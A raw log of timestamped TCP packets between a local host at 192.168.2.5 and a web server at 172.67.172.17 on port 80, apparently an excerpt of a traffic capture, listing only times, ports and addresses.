Feb 25, 2021 11:04:07.510457993 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.510754108 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.511136055 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.511164904 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.511267900 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.511822939 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.511850119 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.511924982 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.512491941 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.512516022 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.512761116 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.513202906 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.513226032 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.513278008 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.513819933 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.513840914 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.514446020 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.514497042 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.514525890 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.514574051 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.515182972 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.515208006 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.515261889 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.515796900 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.515819073 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.516284943 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.516437054 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.516457081 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.516473055 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.516524076 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.517450094 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.517477989 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.517494917 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.517535925 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.517554998 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.518381119 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.518413067 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.518429995 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.518568993 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.519346952 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.519382954 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.519401073 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.519414902 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.519459009 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.520272970 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.520299911 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.520315886 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.520375967 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.521207094 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.521239042 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.521256924 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.521281004 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.521321058 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.522094965 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.522119999 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.522135019 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.522192001 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.522991896 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.523022890 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.523040056 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.523056030 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.523091078 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.523868084 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.523891926 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.523909092 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.524241924 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.524761915 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.524827003 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.525059938 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.525080919 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.525095940 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.525147915 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.525913954 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.525938988 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.525950909 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.526139975 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.526792049 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.526817083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.526834965 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.526891947 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.527621984 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.527646065 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.527662039 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.527782917 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.528471947 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.528495073 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.528507948 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.528546095 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.529356956 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.529417992 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.529421091 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.529442072 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.529483080 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.530181885 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.530210018 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.530235052 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.530267954 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.530985117 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.531009912 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.531025887 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.531326056 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.531793118 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.531819105 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.531835079 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.531892061 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.532629967 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.532650948 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.532664061 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.532912016 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.533431053 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.533454895 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.533468962 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.533564091 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.534259081 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.534284115 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.534300089 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.534328938 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.534373999 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.535092115 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.535115957 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.535131931 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.535204887 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.535914898 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.535936117 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.535948038 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.535989046 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.536022902 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.536700964 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.536726952 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.536746979 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.537167072 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.537555933 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.537580013 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.537595987 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.537630081 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.537667036 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.538367987 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.538395882 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.538413048 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.539050102 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.539176941 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.539197922 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.539212942 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.539247036 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.539283037 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.539999962 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.540026903 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.540041924 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.540101051 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.540843010 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.540863991 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.540877104 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.540914059 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.540946960 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.541645050 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.541671038 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.541687012 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.541745901 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.542478085 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.542506933 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.542521954 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.542548895 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.542598009 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.543107986 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.543137074 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.543153048 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.543169022 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.543231010 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.543905973 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.543926001 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.543936968 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.543952942 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.543997049 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.544030905 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.544755936 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.544780970 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.544797897 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.544812918 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.544878006 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.545582056 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.545623064 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.545639992 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.545655966 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.545685053 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.545707941 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.546459913 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.546484947 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.546503067 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.546518087 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.546571970 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.547282934 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.547302008 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.547317982 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.547353029 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.547404051 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.547454119 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.548134089 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.548162937 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.548180103 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.548196077 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.548278093 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.548973083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.549006939 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.549026012 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.549042940 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.549083948 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.549122095 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.549849033 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.549871922 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.549886942 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.549906015 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.549927950 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.549979925 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.550633907 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.550657988 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.550669909 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.550683022 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.550741911 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.551511049 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.551537037 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.551564932 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.551578045 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.552172899 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.552345991 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.552366018 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.552381992 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.552397966 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.552429914 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.552457094 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.553212881 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.553239107 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.553252935 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.553268909 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.553319931 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.553991079 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.554014921 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.554034948 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.554053068 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.554100037 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.554141045 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.554810047 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.554837942 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.554857016 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.554876089 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.555092096 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.555629015 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.555656910 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.555676937 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.555695057 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.555727959 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.555756092 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.557230949 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.557257891 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.557276964 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.557295084 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.557331085 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.557379007 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.558921099 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.558953047 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.558969975 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.558990002 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.559026957 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.559056044 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.560425043 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.560456038 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.560472965 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.560487986 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.560522079 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.560549974 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.560762882 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.560784101 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.560800076 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.560817003 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.560827971 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.560853004 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.561634064 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.561657906 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.561676979 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.561693907 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.561729908 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.561754942 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.562414885 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.562441111 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.562455893 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.562473059 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.562486887 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.562508106 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.563226938 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.563251019 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.563266993 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.563282013 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.563308954 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.563337088 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.564033985 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.564057112 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.564073086 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.564090967 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.564604044 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.564796925 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.564821959 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.564837933 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.564856052 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.564874887 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.564903975 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.565660000 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.565684080 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.565700054 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.565716028 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.565762043 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.566415071 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.566440105 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.566452026 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.566468954 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.566493034 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.566517115 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.567224979 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.567249060 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.567265987 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.567282915 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.567601919 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.568068027 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.568093061 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.568109989 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.568125963 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.568172932 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.568794012 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.568813086 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.568829060 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.568845034 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.568881989 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.568908930 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.569596052 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.569622040 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.569638968 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.569673061 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.569674969 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.569708109 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.570391893 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.570417881 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.570436954 CET	80	49716	172.67.172.17	192.168.2.5
